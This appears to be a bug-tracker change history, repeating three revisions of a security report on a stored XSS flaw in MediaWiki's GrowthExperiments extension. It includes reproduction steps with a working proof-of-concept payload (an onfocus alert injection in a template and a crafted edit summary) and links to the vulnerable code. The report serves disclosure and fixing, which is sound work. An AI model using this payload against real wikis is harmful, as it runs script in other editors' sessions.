Change Details

The GrowthExperiments extension inserts parsed, user-controlled wikitext into autocomments, allowing for stored XSS to be performed by anybody who can edit. ## Reproduction steps 1. Install GrowthExperiments 2. Create `Template:AutocommentPayload` with `<pre tabindex="0" data-xss="[[#/autofocus/onfocus=alert(1);//">]]</pre>` as the contents 3. Edit an existing(!) page and set the edit summary to `/*growthexperiments-manage-mentors-summary-add-admin-no-reason:{{AutocommentPayload}}*/` 4. Click "Show changes" {F70675855} {F70675861} The payload will also be executed in other places that render edit summaries, like `?action=history` or `Special:RecentChanges`. ## Cause The extension sets the autocomment to a parsed message with a user-provided param: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#277 Parsed HTML is not safe to use in edit summaries. The XSS is also exploitable by users with the `editinterface` permission. There are 15 affected messages: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#259 https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/HomepageHooks.php#1249 ## Explanation The payload is explained in T409737, which is essentially the same issue (but not exploitable by unprivileged users). ## Additional information * MediaWiki: 1.46.0-alpha * GrowthExperiments: e510edc

The GrowthExperiments extension inserts parsed, user-controlled wikitext into autocomments, allowing for stored XSS to be performed by anybody who can edit. ## Reproduction steps 1. Install GrowthExperiments 2. Create `Template:AutocommentPayload` with `<pre tabindex="0" data-xss="[[#/autofocus/onfocus=alert(1);//">]]</pre>` as the contents 3. Edit an existing(!) page and set the edit summary to `/*growthexperiments-manage-mentors-summary-add-admin-no-reason:{{AutocommentPayload}}*/` 4. Click "Show changes" {F70675855} {F70675861} The payload will also be executed in other places that render edit summaries, like `?action=history` or `Special:RecentChanges`. ## Cause The extension sets the autocomment to a parsed message with a user-provided param: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#277 Parsed HTML is not safe to use in edit summaries. The XSS is also exploitable by users with the `editinterface` permission. There are 15 affected messages: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#259 https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/HomepageHooks.php#1249 Another message is inserted as text, allowing for stored XSS as well: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#252 ## Explanation The payload is explained in T409737, which is essentially the same issue (but not exploitable by unprivileged users). ## Additional information * MediaWiki: 1.46.0-alpha * GrowthExperiments: e510edc

The GrowthExperiments extension inserts parsed, user-controlled wikitext into autocomments, allowing for stored XSS to be performed by anybody who can edit. ## Reproduction steps 1. Install GrowthExperiments 2. Create `Template:AutocommentPayload` with `<pre tabindex="0" data-xss="[[#/autofocus/onfocus=alert(1);//">]]</pre>` as the contents 3. Edit an existing(!) page and set the edit summary to `/*growthexperiments-manage-mentors-summary-add-admin-no-reason:{{AutocommentPayload}}*/` 4. Click "Show changes" {F70675855} {F70675861} The payload will also be executed in other places that render edit summaries, like `?action=history` or `Special:RecentChanges`. ## Cause The extension sets the autocomment to a parsed message with a user-provided param: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#277 Parsed HTML is not safe to use in edit summaries. The XSS is also exploitable by users with the `editinterface` permission. There are 15 affected messages: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#259 https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/HomepageHooks.php#1249 Another message is inserted as text, allowing for stored XSS as well: https://gerrit.wikimedia.org/g/mediawiki/extensions/GrowthExperiments/+/289fbf05350e5476bbdaa3262b41e4c3bdf88ab0/includes/Mentorship/Hooks/MentorHooks.php#252 ## Explanation The payload is explained in T409737, which is essentially the same issue (but not exploitable by unprivileged users). ## Additional information * MediaWiki: 1.46.0-alpha * GrowthExperiments: e510edc